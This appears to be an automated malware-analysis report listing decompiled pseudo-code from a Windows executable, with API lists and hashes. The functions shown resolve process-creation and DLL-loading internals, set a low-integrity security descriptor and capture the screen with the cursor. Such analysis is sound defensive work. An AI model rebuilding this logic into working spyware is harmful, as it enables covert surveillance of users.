    				intOrPtr _v812;
    				signed int _v816;
    				intOrPtr _v820;
    				signed int** _v824;
    				struct HINSTANCE__* _v828;
    				void* __edi;
    				void* __esi;
    				signed int _t40;
    				struct HINSTANCE__* _t43;
    				struct HINSTANCE__* _t47;
    				_Unknown_base(*)()* _t53;
    				void* _t54;
    				signed int _t57;
    				void** _t58;
    				signed int _t62;
    				signed int _t64;
    				signed int _t65;
    				signed int _t67;
    				void* _t73;
    				intOrPtr _t77;
    				signed int _t78;
    				signed int _t79;
    				signed int _t80;
    				struct HINSTANCE__* _t81;
    				int _t83;
    				signed int _t86;
    				void* _t89;
    				signed int* _t91;
    				signed int _t95;
    				WCHAR* _t97;
    				void* _t98;
    				signed int* _t100;
    
    				_t89 = __edx;
    				_t87 = __ecx;
    				_t95 = _a4 & 0x00000001;
    				_v816 = _t95;
    				if(_t95 != 0) {
    					_t83 = 0;
    					__eflags = 0;
    				} else {
    					_t83 = 0;
    					 *0x423968 = 0;
    				}
    				_t91 = E00412738();
    				 *0x423980 = _t91;
    				if(_t91 == _t83) {
    					L27:
    					_t40 = 0;
    				} else {
    					if(_t95 != _t83) {
    						_v816 = E00412672(_t87, _t89, _t91, "GetProcAddress");
    						_v816 = E00412672(_t87, _t89, _t91, "LoadLibraryA");
    						_t43 =  *0x42397c;
    						_v828 = _t43;
    						_t87 =  *((intOrPtr*)(_t43 + 0x3c)) + _t43 + 0x80;
    						__eflags = _v816 - _t83;
    						if(_v816 == _t83) {
    							goto L21;
    						} else {
    							__eflags = _v812 - _t83;
    							if(_v812 == _t83) {
    								goto L21;
    							} else {
    								_t91 =  *_t87;
    								__eflags = _t91 - _t83;
    								if(_t91 <= _t83) {
    									goto L21;
    								} else {
    									__eflags = _t87[1] - 0x14;
    									if(_t87[1] <= 0x14) {
    										goto L21;
    									} else {
    										_t91 = _t91 + _t43;
    										__eflags =  *_t91 - _t83;
    										if( *_t91 == _t83) {
    											goto L21;
    										} else {
    											while(1) {
    												_t77 = _v808(_t91[3] + _v820);
    												_v808 = _t77;
    												__eflags = _t77 - _t83;
    												if(_t77 == _t83) {
    													goto L27;
    												}
    												_t100 = _v824 +  *_t91;
    												_t86 = _v824 + _t91[4];
    												while(1) {
    													_t78 =  *_t100;
    													__eflags = _t78;
    													if(__eflags == 0) {
    														break;
    													}
    													if(__eflags >= 0) {
    														_t87 = _v824;
    														_t79 =  &(_v824[0]) + _t78;
    													} else {
    														_t79 = _t78 & 0x0000ffff;
    													}
    													_t80 = _v816(_v808, _t79);
    													__eflags = _t80;
    													if(_t80 == 0) {
    														goto L27;
    													} else {
    														 *_t86 = _t80;
    														_t100 =  &(_t100[1]);
    														_t86 = _t86 + 4;
    														__eflags = _t86;
    														continue;
    													}
    													goto L47;
    												}
    												_t91 =  &(_t91[5]);
    												_t83 = 0;
    												__eflags =  *_t91;
    												if( *_t91 != 0) {
    													continue;
    												} else {
    													goto L21;
    												}
    												goto L47;
    											}
    											goto L27;
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 = GetModuleHandleW(_t83);
    						 *0x42397c = _t81;
    						if(_t81 == _t83) {
    							goto L27;
    						} else {
    							L21:
    							_t97 =  &_v800;
    							E00405B00(0xe5, _t97);
    							_t47 = GetModuleHandleW(_t97);
    							 *0x423984 = _t47;
    							if(_t47 == _t83) {
    								goto L27;
    							} else {
    								_t98 = GetProcAddress;
    								 *0x423988 = GetProcAddress(_t47, "NtCreateThread");
    								 *0x42398c = GetProcAddress( *0x423984, "NtCreateUserProcess");
    								 *0x423990 = GetProcAddress( *0x423984, "NtQueryInformationProcess");
    								 *0x423994 = GetProcAddress( *0x423984, "RtlUserThreadStart");
    								 *0x423998 = GetProcAddress( *0x423984, "LdrLoadDll");
    								_t53 = GetProcAddress( *0x423984, "LdrGetDllHandle");
    								 *0x42399c = _t53;
    								if( *0x423988 != _t83 ||  *0x42398c != _t83) {
    									if( *0x423990 == _t83 ||  *0x423998 == _t83 || _t53 == _t83) {
    										goto L27;
    									} else {
    										_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
    										 *0x4231a4 = _t54;
    										__eflags = _t54 - _t83;
    										if(_t54 != _t83) {
    											 *0x4223b3 = 1;
    										} else {
    											 *0x4231a4 = GetProcessHeap();
    											 *0x4223b3 = 0;
    										}
    										 *0x4227d8 = _t83;
    										 *0x4223b2 = 0;
    										InitializeCriticalSection(0x4237dc);
    										 *0x423774 = _t83; // executed
    										__imp__#115(0x202,  &_v780); // executed
    										_t57 = E00412772(_a4, _t87, _t91, _t98);
    										__eflags = _t57;
    										if(_t57 == 0) {
    											goto L27;
    										} else {
    											__eflags = _v824 - _t83;
    											if(_v824 != _t83) {
    												L34:
    												_t58 = E0040849C(_t87, 0xffffffff, 0x423978);
    												 *0x42396c = _t58;
    												__eflags = _t58 - _t83;
    												if(_t58 == _t83) {
    													goto L27;
    												} else {
    													 *0x423970 = GetLengthSid( *_t58);
    													 *0x423974 = E00408234( *( *0x42396c), _t59);
    													_t62 = E004127F1(_t61, _a4);
    													__eflags = _t62;
    													if(_t62 == 0) {
    														goto L27;
    													} else {
    														 *0x423bd8 = GetCurrentProcessId();
    														 *0x423bdc = _t83;
    														__eflags = _v824 - _t83;
    														if(_v824 != _t83) {
    															_t64 = 1;
    														} else {
    															_t64 = E00412853();
    														}
    														__eflags = _t64;
    														if(_t64 == 0) {
    															goto L27;
    														} else {
    															__eflags = _v824 - _t83;
    															if(_v824 == _t83) {
    																E00413167( &_v788);
    																_t87 = 0x423dd6;
    																E0040B4DE(0x423dd6, 0x423be0,  *0x423974,  &_v293, _t83);
    															}
    															_t65 = E004128A5(_a4);
    															__eflags = _t65;
    															if(_t65 == 0) {
    																goto L27;
    															} else {
    																__eflags = _a4 & 0x00000002;
    																 *0x4231b4 = _t83;
    																 *0x423348 = 0;
    																 *0x423f60 = 0;
    																 *0x423ef8 = 0;
    																 *0x423e80 = 0;
    																 *0x4237f8 = 0;
    																 *0x423778 = 0;
    																if(__eflags == 0) {
    																	_t67 = 1;
    																} else {
    																	_t67 = E0041295C(_t87, _t89, __eflags);
    																}
    																__eflags = _t67;
    																_t38 = _t67 != 0;
    																__eflags = _t38;
    																_t40 = _t67 & 0xffffff00 | _t38;
    															}
    														}
    													}
    												}
    											} else {
    												_t73 = CreateEventW(0x4239a0, 1, _t83, _t83);
    												 *0x423e30 =  *0x423e30 | 0xffffffff;
    												 *0x423e2c = _t73;
    												__eflags = _t73 - _t83;
    												if(_t73 == _t83) {
    													goto L27;
    												} else {
    													goto L34;
    												}
    											}
    										}
    									}
    								} else {
    									goto L27;
    								}
    							}
    						}
    					}
    				}
    				L47:
    				return _t40;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412ABE
    • GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00412B94
    • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00412BB3
    • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00412BC5
    • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00412BD7
    • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 00412BE9
    • GetProcAddress.KERNEL32(LdrLoadDll), ref: 00412BFB
    • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 00412C0D
    • HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 00412C46
    • GetProcessHeap.KERNEL32(?,?,00000000), ref: 00412C55
    • InitializeCriticalSection.KERNEL32(004237DC,?,?,00000000), ref: 00412C82
    • WSAStartup.WS2_32(00000202,?), ref: 00412C98
    • CreateEventW.KERNEL32(004239A0,00000001,00000000,00000000,?,?,00000000), ref: 00412CB9
    • GetLengthSid.ADVAPI32(00000000,000000FF,00423978,?,?,00000000), ref: 00412CEE
    • GetCurrentProcessId.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00412D1B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
    • String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
    • API String ID: 3091071419-305303173
    • Opcode ID: c4c1bf7b7533ff3637532fa909ff5ff9e23dcb51054f97e224ed9cc91caf1783
    • Instruction ID: 6fd7323765c200343f8b2e40ef8cc7218089845594bba861b031fcf4b7df9b95
    • Opcode Fuzzy Hash: c4c1bf7b7533ff3637532fa909ff5ff9e23dcb51054f97e224ed9cc91caf1783
    • Instruction Fuzzy Hash: A891B0B16053059BCB20AF60EE8569B7BB0BB45306B50093FE545E3260E7BC9AD6CF4D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040A474(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
    				signed int _v8;
    				struct _ACL* _v12;
    				int _v16;
    				int _v20;
    				void** _t19;
    				struct _SECURITY_DESCRIPTOR* _t28;
    				intOrPtr* _t29;
    
    				_t29 = __esi;
    				_t28 = __edi;
    				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
    					return 0;
    				} else {
    					_t19 =  &_v8;
    					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
    					if(_t19 == 0) {
    						L6:
    						_v8 = _v8 | 0xffffffff;
    						L7:
    						if(_t29 != 0) {
    							 *_t29 = 0xc;
    							 *(_t29 + 4) = _t28;
    							 *((intOrPtr*)(_t29 + 8)) = 0;
    						}
    						return _v8;
    					}
    					_v12 = 0;
    					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
    						LocalFree(_v8);
    						goto L6;
    					} else {
    						goto L7;
    					}
    				}
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(004239AC,00000001,00000000,00412CA6,?,?,00000000), ref: 0040A47E
    • SetSecurityDescriptorDacl.ADVAPI32(004239AC,00000001,00000000,00000000,?,?,00000000), ref: 0040A48F
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040A4A5
    • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 0040A4C1
    • SetSecurityDescriptorSacl.ADVAPI32(004239AC,?,?,?,?,?,00000000), ref: 0040A4D5
    • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 0040A4E2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
    • String ID: S:(ML;;NRNWNX;;;LW)
    • API String ID: 2050860296-820036962
    • Opcode ID: d451d168c0620a0446bd3ad444519186941ac7e658922285720047486cfde1f9
    • Instruction ID: 7974bb3cf7227678d72dc9ba89ec9f4832df9e444e5d27d453bdc037707ee1ac
    • Opcode Fuzzy Hash: d451d168c0620a0446bd3ad444519186941ac7e658922285720047486cfde1f9
    • Instruction Fuzzy Hash: 87115E75A00208BFEF219FA48EC8EAFBBBCBB04740F10417AF251F11A0D7759A509B25
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E0040B428() {
    				void* _t30;
    				void* _t33;
    				intOrPtr* _t35;
    				void* _t36;
    				void* _t39;
    				void* _t41;
    
    				_t39 = _t41 - 0x74;
    				_t17 = _t39 - 0x260;
    				 *((char*)(_t39 + 0x73)) = 0;
    				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
    				if(_t17 != 0) {
    					L8:
    					E00406F38(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
    				} else {
    					PathAddBackslashW(_t39 - 0x260);
    					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
    					while(1) {
    						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
    						if(_t17 != 0) {
    							break;
    						}
    						PathRemoveBackslashW(_t39 - 0x260);
    						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
    							goto L8;
    						} else {
    							PathAddBackslashW(_t39 - 0x260);
    							continue;
    						}
    						goto L9;
    					}
    					if( *((short*)(_t39 - 0x44)) != 0x7b) {
    						goto L8;
    					} else {
    						 *((short*)(_t39 + 8)) = 0;
    						_t17 = _t39 - 0x44;
    						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
    						if(_t17 != 0) {
    							goto L8;
    						} else {
    							 *((char*)(_t39 + 0x73)) = 1;
    						}
    					}
    				}
    				L9:
    				return  *((intOrPtr*)(_t39 + 0x73));
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,00000000), ref: 0040B447
    • PathAddBackslashW.SHLWAPI(?), ref: 0040B45E
    • PathRemoveBackslashW.SHLWAPI(?), ref: 0040B46F
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 0040B47C
    • PathAddBackslashW.SHLWAPI(?), ref: 0040B48D
    • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 0040B49C
    • CLSIDFromString.OLE32(?,?), ref: 0040B4B6
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
    • String ID:
    • API String ID: 613918483-0
    • Opcode ID: 1fe148faab61c815cb9d2e44628d9fe61072a704d3843085a379526b694f5e52
    • Instruction ID: 443801c366bcc98e3a266fe1d98edea127dd2f5d8d472aae4a214e74d883bab7
    • Opcode Fuzzy Hash: 1fe148faab61c815cb9d2e44628d9fe61072a704d3843085a379526b694f5e52
    • Instruction Fuzzy Hash: 1A116D7190420DAADF209BB09D88EEF77ACEF04744F144476B914F31A1E339DA489B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			_entry_(signed int __ecx, signed int __edx, void* __eflags, void* __fp0) {
    				char _v5;
    				int _v12;
    				char _v16;
    				char _v20;
    				void* _t22;
    				void* _t28;
    				char _t29;
    				char _t33;
    				void* _t50;
    
    				_t50 = __fp0;
    				_t35 = __edx;
    				_t34 = __ecx;
    				_t33 = 0; // executed
    				_t22 = E00412A7D(__ecx, __edx, 0); // executed
    				if(_t22 == 0) {
    					L24:
    					__eflags = _t33;
    					_t21 = _t33 == 0;
    					__eflags = _t21;
    					ExitProcess(0 | _t21);
    				}
    				_v20 = 0;
    				_v16 = 1;
    				_v5 = 0;
    				SetErrorMode(0x8007);
    				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
    				if(_t28 == 0) {
    					L19:
    					_t29 = E004136AC(_t34, _t35, __eflags, _t50, _v20, _v16);
    					L20:
    					_t33 = _t29;
    					L21:
    					if(_t33 == 0 || ( *0x423968 & 0x00000002) == 0) {
    						goto L24;
    					} else {
    						Sleep(0xffffffff);
    						return _t29;
    					}
    				}
    				_t35 = 0;
    				if(_v12 <= 0) {
    					L14:
    					LocalFree(_t28);
    					_t47 = _t33;
    					if(_t33 == 0) {
    						__eflags = _v5;
    						if(__eflags == 0) {
    							goto L19;
    						}
    						E0040D9C1(_t35);
    						_t29 = E004057F1();
    						__eflags =  *0x423968 & 0x00000004;
    						_t33 = _t29;
    						if(( *0x423968 & 0x00000004) != 0) {
    							_t29 = E0040D83A(0x4231b8, 0);
    						}
    						goto L21;
    					}
    					_t29 = E004134BE(_t47);
    					goto L20;
    				} else {
    					goto L3;
    				}
    				do {
    					L3:
    					_t34 =  *(_t28 + _t35 * 4);
    					if(_t34 != 0 &&  *_t34 == 0x2d) {
    						_t34 =  *(_t34 + 2) & 0x0000ffff;
    						if(_t34 == 0x66) {
    							_v20 = 1;
    						} else {
    							if(_t34 == 0x69) {
    								_t33 = 1;
    							} else {
    								if(_t34 == 0x6e) {
    									_v16 = 0;
    								} else {
    									if(_t34 == 0x76) {
    										_v5 = 1;
    									}
    								}
    							}
    						}
    					}
    					_t35 = _t35 + 1;
    				} while (_t35 < _v12);
    				goto L14;
    			}

    APIs
      • Part of subcall function 00412A7D: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412ABE
      • Part of subcall function 00412A7D: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00412B94
      • Part of subcall function 00412A7D: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00412BB3
      • Part of subcall function 00412A7D: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00412BC5
      • Part of subcall function 00412A7D: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00412BD7
      • Part of subcall function 00412A7D: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 00412BE9
      • Part of subcall function 00412A7D: GetProcAddress.KERNEL32(LdrLoadDll), ref: 00412BFB
      • Part of subcall function 00412A7D: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 00412C0D
    • SetErrorMode.KERNEL32(00008007,00000000), ref: 00413A19
    • GetCommandLineW.KERNEL32(?), ref: 00413A23
    • CommandLineToArgvW.SHELL32(00000000), ref: 00413A2A
    • LocalFree.KERNEL32(00000000), ref: 00413A7F
    • Sleep.KERNEL32(000000FF,?,00000001), ref: 00413AD5
    • ExitProcess.KERNEL32 ref: 00413AE6
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
    • String ID:
    • API String ID: 1184560534-0
    • Opcode ID: 90556e5a0e035d1edcef6f1ada19a004e8b6826e8c76c31657c10fe69d562758
    • Instruction ID: a15749b3b6650ca325594cf02fc8f71ca77a5a32ea9d633044d43a9a58a78b47
    • Opcode Fuzzy Hash: 90556e5a0e035d1edcef6f1ada19a004e8b6826e8c76c31657c10fe69d562758
    • Instruction Fuzzy Hash: B1210730944244A5DB259FB989497EE3BA45F023CAF1C409BE0C17A2A2C77E4BC9C71E
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 39%
    			E00411FB9(WCHAR* _a4, char _a8, signed short _a12) {
    				struct HINSTANCE__* _v12;
    				struct HINSTANCE__* _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				void* _v28;
    				void* _v32;
    				struct HDC__* _v36;
    				_Unknown_base(*)()* _v40;
    				_Unknown_base(*)()* _v44;
    				struct tagPOINT _v52;
    				_Unknown_base(*)()* _v56;
    				struct HINSTANCE__* _v60;
    				_Unknown_base(*)()* _v64;
    				_Unknown_base(*)()* _v68;
    				_Unknown_base(*)()* _v72;
    				_Unknown_base(*)()* _v76;
    				_Unknown_base(*)()* _v80;
    				_Unknown_base(*)()* _v84;
    				_Unknown_base(*)()* _v88;
    				struct HINSTANCE__* _v92;
    				struct HINSTANCE__* _v96;
    				struct HINSTANCE__* _v100;
    				char _v104;
    				_Unknown_base(*)()* _v108;
    				intOrPtr _v112;
    				char _v116;
    				_Unknown_base(*)()* _v120;
    				char _v148;
    				signed int _v152;
    				struct _ICONINFO _v172;
    				char _v188;
    				struct HINSTANCE__* _t169;
    				_Unknown_base(*)()* _t176;
    				struct HINSTANCE__* _t181;
    				_Unknown_base(*)()* _t182;
    				struct HINSTANCE__* _t183;
    				_Unknown_base(*)()* _t191;
    				struct HDC__* _t197;
    				struct HICON__* _t199;
    				signed int _t200;
    				intOrPtr _t202;
    				intOrPtr _t204;
    				void* _t206;
    				void* _t223;
    				intOrPtr* _t224;
    				void* _t239;
    				void* _t248;
    				unsigned int _t260;
    				intOrPtr* _t262;
    				signed short _t263;
    				intOrPtr _t264;
    				WCHAR** _t265;
    				intOrPtr _t268;
    				signed int _t269;
    				signed int _t272;
    				void* _t275;
    
    				_v32 = 0;
    				_v60 = 0;
    				_v16 = 0;
    				_v104 = 1;
    				_v100 = 0;
    				_v96 = 0;
    				_v92 = 0;
    				_t169 = LoadLibraryA("gdiplus.dll");
    				_v20 = _t169;
    				_v24 = GetProcAddress(_t169, "GdiplusStartup");
    				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
    				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
    				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
    				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
    				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
    				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
    				_v108 = _t176;
    				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
    					L66:
    					if(_v20 != 0) {
    						FreeLibrary(_v20);
    					}
    					if(_v60 != 0) {
    						FreeLibrary(_v60);
    					}
    					if(_v16 != 0) {
    						FreeLibrary(_v16);
    					}
    					_t168 =  &_v32; // 0x41247c
    					return  *_t168;
    				} else {
    					_t181 = LoadLibraryA("ole32.dll");
    					_v60 = _t181;
    					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
    					_v120 = _t182;
    					if(_t182 == 0) {
    						goto L66;
    					}
    					_t183 = LoadLibraryA("gdi32.dll");
    					_v16 = _t183;
    					_t262 = GetProcAddress(_t183, "CreateDCW");
    					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
    					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
    					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
    					_v56 = GetProcAddress(_v16, "SelectObject");
    					_v76 = GetProcAddress(_v16, "BitBlt");
    					_v84 = GetProcAddress(_v16, "DeleteObject");
    					_t191 = GetProcAddress(_v16, "DeleteDC");
    					_v68 = _t191;
    					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
    						goto L66;
    					} else {
    						_push(0);
    						_push( &_v104);
    						_push( &_v116);
    						_v104 = 1;
    						_v100 = 0;
    						_v96 = 0;
    						_v92 = 0;
    						if(_v24() != 0) {
    							goto L66;
    						}
    						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
    						_v24 = _t268;
    						if(_t268 == 0) {
    							L65:
    							_v80(_v116);
    							goto L66;
    						}
    						_t197 = _v12(_t268);
    						_v36 = _t197;
    						if(_t197 == 0) {
    							L64:
    							_v68(_v24);
    							goto L65;
    						}
    						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
    						_v12 = _t199;
    						if(_t199 == 0) {
    							L24:
    							_t263 = 0;
    							goto L26;
    						} else {
    							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
    								_v12 = 0;
    							}
    							if(_v12 != 0) {
    								_t263 = _a12;
    								L26:
    								if(_t263 == 0) {
    									_t200 = _v28(_t268, 8);
    									_t269 = _t200;
    									_a12 = _v28(_v24, 0xa);
    								} else {
    									_t269 = _t263 & 0x0000ffff;
    									_a12 = _t269;
    								}
    								_t202 = _v44(_v24, _t269, _a12);
    								_v44 = _t202;
    								if(_t202 == 0) {
    									L63:
    									_v68(_v36);
    									goto L64;
    								} else {
    									_t204 = _v56(_v36, _t202);
    									_v112 = _t204;
    									if(_t204 == 0) {
    										L62:
    										_v84(_v44);
    										goto L63;
    									}
    									_t206 = 0;
    									_t248 = 0;
    									if(_t263 != 0) {
    										_t260 = (_t263 & 0x0000ffff) >> 1;
    										_t206 =  <  ? 0 : _v52.x - _t260;
    										_t248 =  <  ? 0 : _v52.y - _t260;
    										_t81 =  &_v52;
    										 *_t81 = _v52.x - _t206;
    										if( *_t81 < 0) {
    											_v52.x = 0;
    										}
    										_t84 =  &(_v52.y);
    										 *_t84 = _v52.y - _t248;
    										if( *_t84 < 0) {
    											_v52.y = 0;
    										}
    									}
    									_push(0x40cc0020);
    									_push(_t248);
    									_push(_t206);
    									_push(_v24);
    									_push(_a12);
    									_push(_t269);
    									_push(0);
    									_push(0);
    									_push(_v36);
    									if(_v76() == 0) {
    										L61:
    										_v56(_v36, _v112);
    										goto L62;
    									} else {
    										if(_v12 != 0) {
    											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
    											_t239 = _v52.y - _v172.yHotspot;
    											_t240 =  <  ? 0 : _t239;
    											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
    										}
    										_push( &_v12);
    										_push(0);
    										_push(_v44);
    										_v12 = 0;
    										if(_v88() != 0 || _v12 == 0) {
    											goto L61;
    										} else {
    											_push( &_v28);
    											_push( &_a12);
    											_a12 = 0;
    											_v28 = 0;
    											if(_v40() != 0) {
    												L60:
    												_v72(_v12);
    												goto L61;
    											}
    											_t215 = _v28;
    											if(_v28 == 0 || _a12 == 0) {
    												goto L60;
    											} else {
    												_t264 = E00406E55(_t215);
    												_v40 = _t264;
    												if(_t264 == 0) {
    													goto L60;
    												}
    												_push(_t264);
    												_push(_v28);
    												_push(_a12);
    												if(_v64() != 0) {
    													L52:
    													E00406E85(_v40);
    													if(_a12 == 0) {
    														_t122 =  &_v32; // 0x41247c
    														_push(1);
    														_push(0);
    														if(_v120() == 0 && _v32 != 0) {
    															_v152 = 0;
    															if(_a8 > 0) {
    																E00406EC1( &_v148, 0x404724, 0x10);
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
    																_v152 = _v152 + 1;
    															}
    															_t142 =  &_v32; // 0x41247c
    															_t223 = _v108(_v12,  *_t142,  &_v188,  &_v152);
    															_t145 =  &_v32; // 0x41247c
    															_t224 =  *_t145;
    															if(_t223 == 0) {
    																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
    															} else {
    																 *((intOrPtr*)( *_t224 + 8))(_t224);
    																_v32 = 0;
    															}
    														}
    													}
    													goto L60;
    												}
    												_t272 = 0;
    												if(_a12 <= 0) {
    													goto L52;
    												}
    												_t265 = _t264 + 0x30;
    												while(lstrcmpiW(_a4,  *_t265) != 0) {
    													_t272 = _t272 + 1;
    													_t265 =  &(_t265[0x13]);
    													if(_t272 < _a12) {
    														continue;
    													}
    													goto L52;
    												}
    												E00406EC1( &_v188, _t272 * 0x4c + _v40, 0x10);
    												_a12 = 0;
    												goto L52;
    											}
    										}
    									}
    								}
    							}
    							goto L24;
    						}
    					}
    				}
    			}

    (per-line instruction address column omitted; the listed addresses for this function range from 0x00411fd2 to 0x00412461)

    APIs
    • LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 00411FEB
    • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 00411FFC
    • GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00412009
    • GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 00412016
    • GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 00412023
    • GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 00412030
    • GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041203D
    • GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041204A
    • LoadLibraryA.KERNEL32(ole32.dll), ref: 00412092
    • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041209D
    • LoadLibraryA.KERNEL32(gdi32.dll), ref: 004120AF
    • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 004120BA
    • GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 004120C6
    • GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 004120D3
    • GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 004120E0
    • GetProcAddress.KERNEL32(00000000,SelectObject), ref: 004120ED
    • GetProcAddress.KERNEL32(00000000,BitBlt), ref: 004120FA
    • GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00412107
    • GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 00412114
    • LoadImageW.USER32 ref: 004121B8
    • GetIconInfo.USER32(00000000,?), ref: 004121CD
    • GetCursorPos.USER32(?), ref: 004121DB
